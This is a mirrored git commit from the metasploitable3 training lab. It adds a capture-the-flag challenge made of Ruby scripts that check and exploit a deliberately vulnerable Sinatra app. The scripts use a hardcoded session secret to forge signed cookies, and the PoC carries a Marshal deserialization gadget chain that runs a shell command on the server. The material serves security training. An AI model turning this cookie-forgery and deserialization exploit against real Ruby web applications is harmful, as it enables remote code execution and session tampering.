mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-09-21 00:01:14 +02:00
Add 6 of Clubs
This commit is contained in:
parent
129119ac97
commit
5ba1a36fd3
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
1
resources/flags/linux_flags/6_of_clubs/base64_string.txt
Normal file
File diff suppressed because one or more lines are too long
29
resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
Normal file
29
resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb
Normal file
|
@ -0,0 +1,29 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
#
|
||||
# This will check our vulnerable app to see if it's vulnerable or not.
|
||||
# It does so by predicting the hash in the cookie.
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
require 'base64'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
cli = Net::HTTP.new('172.28.128.3', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
res = cli.request(req)
|
||||
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||
data, hash = cookie.split('--')
|
||||
obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
|
||||
puts "[*] Found data: #{obj}"
|
||||
puts "[*] Found hash: #{hash}"
|
||||
puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
|
||||
expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
|
||||
puts "[*] Predicted hash: #{expected_hash}"
|
||||
|
||||
if expected_hash == hash
|
||||
puts "[*] Yay! we can predict the hash. The server is vulnerable."
|
||||
end
|
48
resources/flags/linux_flags/6_of_clubs/get_flag.rb
Normal file
48
resources/flags/linux_flags/6_of_clubs/get_flag.rb
Normal file
|
@ -0,0 +1,48 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This PoC will inject Ruby code in our vulnerable app.
|
||||
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
require 'base64'
|
||||
require 'digest'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
http = Net::HTTP.new('172.28.128.3', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
res = http.request(req)
|
||||
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||
data, hash = cookie.split('--')
|
||||
obj = Marshal.load(Base64.decode64(CGI.unescape(data)))
|
||||
sid = obj['session_id']
|
||||
puts "[*] Obtained session ID: #{sid}"
|
||||
|
||||
puts "[*] Using stolen SECRET: #{SECRET}"
|
||||
puts "[*] Modifying _metasploitable cookie to 'six of clubs'"
|
||||
data = { 'session_id' => sid, '_metasploitable' => "six of clubs" }
|
||||
dump = [ Marshal.dump(data) ].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||
|
||||
req = Net::HTTP::Get.new('/flag')
|
||||
req['Cookie'] = cookie
|
||||
res = http.request(req)
|
||||
|
||||
File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) }
|
||||
md5 = Digest::MD5.hexdigest(res.body)
|
||||
puts "[*] 6_of_clubs.png downloaded."
|
||||
puts "[*] 6 of Clubs MD5: #{md5}"
|
||||
|
||||
=begin
|
||||
$ ruby get_flag.rb
|
||||
[*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752
|
||||
[*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f
|
||||
[*] Modifying _metasploitable cookie to 'six of clubs'
|
||||
[*] 6_of_clubs.png downloaded.
|
||||
[*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b
|
||||
=end
|
34
resources/flags/linux_flags/6_of_clubs/poc.rb
Normal file
34
resources/flags/linux_flags/6_of_clubs/poc.rb
Normal file
|
@ -0,0 +1,34 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This PoC will inject Ruby code in our vulnerable app.
|
||||
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
module Erubis;class Eruby;end;end
|
||||
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||
|
||||
erubis = Erubis::Eruby.allocate
|
||||
erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
|
||||
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||
proxy.instance_variable_set :@instance, erubis
|
||||
proxy.instance_variable_set :@method, :result
|
||||
proxy.instance_variable_set :@var, "@result"
|
||||
|
||||
session = { 'session_id' => '', 'exploit' => proxy }
|
||||
|
||||
dump = [ Marshal.dump(session) ].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||
|
||||
http = Net::HTTP.new('127.0.0.1', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
req['Cookie'] = cookie
|
||||
res = http.request(req)
|
||||
puts "Done"
|
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
BIN
resources/flags/linux_flags/6_of_clubs/source.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 419 KiB |
Loading…
Reference in New Issue
Block a user